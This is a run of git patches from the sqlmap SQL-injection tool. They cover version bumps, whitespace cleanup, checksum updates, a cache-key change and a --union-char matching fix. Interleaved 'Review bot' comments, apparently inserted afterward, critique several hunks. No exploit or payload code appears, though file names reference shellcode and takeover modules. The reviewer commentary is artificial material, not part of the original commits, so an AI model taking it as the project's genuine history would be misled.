+ BASE_DIRECTORY = os.getcwd()
+
+ print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
+ for root, dirs, files in os.walk(BASE_DIRECTORY):
+ if any(_ in root for _ in ("extra", "thirdparty")):
+ continue
+ for name in files:
+ filepath = os.path.join(root, name)
+ check(filepath)
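Review bot: In `check()` the handle opened by `content = open(filepath, "rb").read()` is never closed and is left to garbage collection, which on a large tree means many dangling descriptors; a context manager fixes it in two lines: `with open(filepath, "rb") as f:` / `content = f.read()`. The header comment `# Runs pylint on all python scripts found in a directory tree` was carried over from the pylint helper and does not describe this script, which reports runs of three consecutive newlines — it should say so, e.g. `# Reports *.py files containing consecutive empty lines (three newlines in a row)`. The commented-out `#if re.search(r"\r?\n\r?\n", content):` line is the only use of `re`, so either it becomes the real check (it would also catch CRLF files, which the current `"\n\n\n" in content` test misses) or both it and `import re` should be removed.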
diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 510c022a9cc..d1a26ade315 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1562,7 +1562,6 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True - threadData = getCurrentThreadData() if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: diff --git a/lib/core/settings.py b/lib/core/settings.py index 6bbc45864d5..ee4adaa4c04 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.0" +VERSION = "1.2.5.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 1b3c225f319..1f42b171761 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -13,7 +13,6 @@ from lib.core.data import paths from lib.parse.handler import FingerprintHandler - def headersParser(headers): """ This function calls a class that parses the input HTTP headers to diff --git a/lib/request/connect.py b/lib/request/connect.py index 92c3f3509a0..2d6e5dfd07b 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -120,7 +120,6 @@ class WebSocketException(Exception): from thirdparty.odict.odict import OrderedDict from thirdparty.socks.socks import ProxyError - class Connect(object): """ This class defines methods used to perform HTTP requests diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index eb653c9895b..490c8c2987e 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py 
@@ -27,7 +27,6 @@ from lib.takeover.web import Web from lib.takeover.xp_cmdshell import XP_cmdshell - class Abstraction(Web, UDF, XP_cmdshell): """ This class defines an abstraction layer for OS takeover functionalities diff --git a/lib/takeover/web.py b/lib/takeover/web.py index a907bc14905..8f5b5616d08 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -53,7 +53,6 @@ from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset - class Web: """ This class defines web-oriented OS takeover functionalities for diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py index 3910e1302ec..7a580e6e5c4 100644 --- a/lib/techniques/dns/test.py +++ b/lib/techniques/dns/test.py @@ -14,7 +14,6 @@ from lib.core.exception import SqlmapNotVulnerableException from lib.techniques.dns.use import dnsUse - def dnsTest(payload): logger.info("testing for data retrieval through DNS channel") diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 42914f16693..3cf607b5451 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -33,7 +33,6 @@ from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request - def dnsUse(payload, expression): """ Retrieve the output of a SQL query taking advantage of the DNS diff --git a/lib/utils/api.py b/lib/utils/api.py index 967340fc48a..52ee0f44265 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -104,9 +104,7 @@ def execute(self, statement, arguments=None): def init(self): self.execute("CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)") - self.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)") - self.execute("CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)") class Task(object): 
@@ -199,7 +197,6 @@ def engine_get_returncode(self): def engine_has_terminated(self): return isinstance(self.engine_get_returncode(), int) - # Wrapper functions for sqlmap engine class StdDbOut(object): def __init__(self, taskid, messagetype="stdout"): @@ -573,7 +570,6 @@ def scan_data(taskid): logger.debug("[%s] Retrieved scan data and error messages" % taskid) return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) - # Functions to handle scans' logs @get("/scan//log//") def scan_log_limited(taskid, start, end): @@ -601,7 +597,6 @@ def scan_log_limited(taskid, start, end): logger.debug("[%s] Retrieved scan log messages subset" % taskid) return jsonize({"success": True, "log": json_log_messages}) - @get("/scan//log") def scan_log(taskid): """ @@ -621,7 +616,6 @@ def scan_log(taskid): logger.debug("[%s] Retrieved scan log messages" % taskid) return jsonize({"success": True, "log": json_log_messages}) - # Function to handle files inside the output directory @get("/download///") def download(taskid, target, filename): @@ -648,7 +642,6 @@ def download(taskid, target, filename): logger.warning("[%s] File does not exist %s" % (taskid, target)) return jsonize({"success": False, "message": "File does not exist"}) - def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None): """ REST-JSON API server diff --git a/lib/utils/getch.py b/lib/utils/getch.py index 65043421e4e..d2c204ac4c5 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -22,7 +22,6 @@ def __init__(self): def __call__(self): return self.impl() - class _GetchUnix(object): def __init__(self): __import__("tty") @@ -41,7 +40,6 @@ def __call__(self): termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch - class _GetchWindows(object): def __init__(self): __import__("msvcrt") 
@@ -50,7 +48,6 @@ def __call__(self): import msvcrt return msvcrt.getch() - class _GetchMacCarbon(object): """ A function which returns the current ASCII key that is down; @@ -79,5 +76,4 @@ def __call__(self): (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] return chr(msg & 0x000000FF) - getch = _Getch() diff --git a/lib/utils/search.py b/lib/utils/search.py index 8c49b534e51..e2cca24b948 100644 --- a/lib/utils/search.py +++ b/lib/utils/search.py @@ -36,7 +36,6 @@ from lib.request.basic import decodePage from thirdparty.socks import socks - def _search(dork): """ This method performs the effective search on Google providing diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py index b6b64ac0bee..e79d281a863 100644 --- a/plugins/dbms/db2/enumeration.py +++ b/plugins/dbms/db2/enumeration.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ - from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index ed532a57b03..6a584b8a9c3 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ - from lib.core.common import Backend from lib.core.common import Format from lib.core.data import conf diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index 202d6193c1c..02a23e967f9 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -15,7 +15,6 @@ from plugins.dbms.mssqlserver.takeover import Takeover from plugins.generic.misc import Miscellaneous - class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): """ This class defines Microsoft SQL Server methods diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index ae2722a9aed..f214b39a32a 100644 
--- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -19,7 +19,6 @@ from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector - class Connector(GenericConnector): """ Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite diff --git a/sqlmap.py b/sqlmap.py index 49dadc22817..4593e715b42 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -108,7 +108,6 @@ def checkEnvironment(): for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"): globals()[_] = getattr(sys.modules["lib.core.exception"], _) - def main(): """ Main function of sqlmap when running from command line. diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e503c6e6b94..87a490555df 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -16,12 +16,13 @@ d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ 220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py +1f33abe1a67493909d29a35ca72ecedb extra/shutils/newlines.py 71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -aea19b45c6154035a689954719c753dc lib/controller/checks.py +a0ae21cc46b8f5fd0afe0a173ceaab70 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 
@@ -46,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-1b801d825811ee4362e07e568e8a928e lib/core/settings.py
+0f03fed8767ab10c9bf9789d4deb0bde lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -60,7 +61,7 @@ e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py
 5e46fac7f824ba8ab8003a1cd47d8af3 lib/parse/cmdline.py
 fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py
-aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py
+6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py
 33f21b11b7963062df8fa2292229df80 lib/parse/html.py
 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py
 ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
@@ -68,7 +69,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
 596988f14408cde1a2d3b5c9f231873a lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
-5b7f216827207c085df96bb56ed5e600 lib/request/connect.py
+e9bbba4a133effeae86d146286f9116b lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py
@@ -79,30 +80,30 @@ aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py -8d31425f36a7a9c093eb9bef44589593 lib/takeover/abstraction.py +747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py +2665fa7eedb19a1b10ffe949999b75f1 lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py 2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py -855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py -733f3419ff2ea23f75bc24e36f4746d9 lib/techniques/dns/use.py +799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py +bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py a36be917cf86a5ee407c83d74567f324 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py +8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py -635ed692ab141d428d0957b71b25c1aa lib/utils/getch.py 
+f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py @@ -111,7 +112,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -2e3e7213f50b52fc4d5a014a2ff8d163 lib/utils/search.py +2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py @@ -124,9 +125,9 @@ e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py -0884e475c98701f8e698150aa122fb76 plugins/dbms/db2/enumeration.py +4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -ba492b2aaa6432b5548c5a8fa5eec435 plugins/dbms/db2/fingerprint.py +b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py 
@@ -163,7 +164,7 @@ bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py 51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py -affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py +f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py @@ -187,7 +188,7 @@ c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py -3009438ba259ca159c5ce9799f27dec1 plugins/dbms/sqlite/connector.py +80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py 5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py 90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py @@ -224,7 +225,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -5d1d27e7237584c4499ee9a3e698e384 sqlmap.py +e585626909b2de432f1fb71e0944b130 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 73d8952f2a9c6dd65fa4fc4846c6aebb02611f09 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar
Date: Fri, 4 May 2018 16:29:36 +0200
Subject: [PATCH 126/428] Potential patch for #3084
---
lib/core/decorators.py | 2 +-
lib/core/settings.py | 2 +-
txt/checksum.md5 | 4 ++--
3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/core/decorators.py b/lib/core/decorators.py
index 94d0925c1d0..1bf5d512798 100644
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -17,7 +17,7 @@ def cachedmethod(f, cache={}):
"""
def _(*args, **kwargs):
- key = int(hashlib.md5("".join(str(_) for _ in (f, args, kwargs))).hexdigest()[:8], 16)
+ key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff
if key not in cache:
cache[key] = f(*args, **kwargs)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index ee4adaa4c04..7d292f43f01 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
# sqlmap version (...)
-VERSION = "1.2.5.1"
+VERSION = "1.2.5.2"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 87a490555df..791ab9c5ae7 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -32,7 +32,7 @@ f42e346d33199b4f663cff6efe2be775 lib/core/common.py
0d082da16c388b3445e656e0760fb582 lib/core/convert.py
9f87391b6a3395f7f50830b391264f27 lib/core/data.py
72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
-04638422b6ad1613238a9abf4fdf6491 lib/core/decorators.py
+93567739d591829c1fb9ff77a50bcc87 lib/core/decorators.py
fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py
da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py
9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py
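Review bot: The new key still depends on `str(kwargs)`, and on Python 2 two equal dicts do not necessarily print their items in the same order, so the same call can hash to different keys and miss the cache; building the key from a canonical form, `"|".join(str(_) for _ in (f, args, sorted(kwargs.items())))`, avoids that. The cache is the shared mutable default `cache={}` visible in the hunk header, so entries for every decorated function accumulate process-wide and are never evicted; a comment such as `# NOTE: process-wide, never evicted - only for pure functions with a bounded argument space` would record that constraint for anyone reaching for the decorator. Masking the full digest with `0x7fffffffffffffff` is fine for a lookup key, but a one-line comment saying why the mask is there (presumably to keep the key a plain signed 64-bit value) would help. The inner function `_` continues past the hunk.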
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0f03fed8767ab10c9bf9789d4deb0bde lib/core/settings.py +8a8b9515cd98eb1e1b0701baf84e9d35 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From ec6ad3ce6803ce62eb9634d3b991612eb0ef7a46 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 May 2018 14:22:06 +0200 Subject: [PATCH 127/428] Bug fix (non-digit --union-char has not been working properly) --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7d292f43f01..6f4c3420105 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.2" +VERSION = "1.2.5.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 6d94cb875b4..963222bef34 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py 
@@ -116,7 +116,7 @@ def _orderByTest(cols):
items.append((count, ratio))
if not isNullValue(kb.uChar):
- for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
+ for regex in (kb.uChar.strip("'"), r'>\s*%s\s*<' % kb.uChar.strip("'")):
contains = tuple((count, re.search(regex, _ or "", re.IGNORECASE) is not None) for count, _ in pages.items())
if len(filter(lambda _: _[1], contains)) == 1:
retVal = filter(lambda _: _[1], contains)[0][0]
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 791ab9c5ae7..def96febf81 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-8a8b9515cd98eb1e1b0701baf84e9d35 lib/core/settings.py
+dd60aab11bccebf9ae75ebedb36a2368 lib/core/settings.py
0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -97,7 +97,7 @@ bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py
f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py
-a36be917cf86a5ee407c83d74567f324 lib/techniques/union/test.py
+72b73cfb962cdbe9107e25df1bc43ffb lib/techniques/union/test.py
11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py
8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py
37dfb641358669f62c2acedff241348b lib/utils/brute.py
From 1d382bcb4d2b03d5414f21f520ba5a7094e8b3d7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Sat, 5 May 2018 14:33:00 +0200
Subject: [PATCH 128/428] Fixes #3086
---
lib/core/settings.py | 2 +-
lib/techniques/union/test.py | 6 +++---
txt/checksum.md5 | 4 ++--
3 files changed, 6 insertions(+), 6 deletions(-)
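Review bot: `kb.uChar.strip("'")` is handed to `re.search` as a pattern, so a user-supplied `--union-char` containing regex metacharacters (`(`, `[`, `?`, `*`) raises `re.error` from inside the ORDER BY test, and a `.` silently matches any character instead of itself; the stripped value should be escaped before it is used as a pattern, `for regex in (re.escape(kb.uChar.strip("'")), r'>\s*%s\s*<' % re.escape(kb.uChar.strip("'"))):`. That keeps the numeric default behaving exactly as today while making non-digit chars, which this commit is meant to support, match literally. `_orderByTest` starts before this hunk.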
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 6f4c3420105..936c23c7d25 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
# sqlmap version (...)
-VERSION = "1.2.5.3"
+VERSION = "1.2.5.4"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 963222bef34..0ca8f656937 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -117,9 +117,9 @@ def _orderByTest(cols):
if not isNullValue(kb.uChar):
for regex in (kb.uChar.strip("'"), r'>\s*%s\s*<' % kb.uChar.strip("'")):
- contains = tuple((count, re.search(regex, _ or "", re.IGNORECASE) is not None) for count, _ in pages.items())
- if len(filter(lambda _: _[1], contains)) == 1:
- retVal = filter(lambda _: _[1], contains)[0][0]
+ contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None]
+ if len(contains) == 1:
+ retVal = contains[0]
break
if not retVal:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index def96febf81..b275a378482 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-dd60aab11bccebf9ae75ebedb36a2368 lib/core/settings.py
+8fc5eef70dd6099c61c26c48767c4ef5 lib/core/settings.py
0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
6306284edcccc185b2df085438572b0d lib/core/target.py
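Review bot: The rewritten comprehension still passes the unescaped `kb.uChar.strip("'")` to `re.search`, so the refactor leaves a `--union-char` with regex metacharacters either raising `re.error` or matching more than intended; wrapping both elements of the tuple on the line above in `re.escape(...)` keeps the match literal without touching the new list logic. Since the first pattern is now just the bare marker, a plain case-insensitive substring test would do for it and sidestep the regex entirely. A short comment on the `if len(contains) == 1:` line, such as `# exactly one page must carry the marker; 0 or >1 hits is ambiguous`, would explain why the other outcomes are discarded, which is not obvious from the code. `_orderByTest` begins outside the hunk.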
@@ -97,7 +97,7 @@ bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py
f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py
-72b73cfb962cdbe9107e25df1bc43ffb lib/techniques/union/test.py
+2075952d327723169de8fb7ac667c9c1 lib/techniques/union/test.py
11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py
8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py
37dfb641358669f62c2acedff241348b lib/utils/brute.py
From 7a8add041285db1ea0f63b0fd08391d21907313e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Sat, 5 May 2018 14:49:35 +0200
Subject: [PATCH 129/428] Update regarding #3068
---
lib/core/settings.py | 2 +-
sqlmap.py | 4 ++--
txt/checksum.md5 | 4 ++--
3 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 936c23c7d25..e85af5f8bf7 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
# sqlmap version (...)
-VERSION = "1.2.5.4"
+VERSION = "1.2.5.5"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
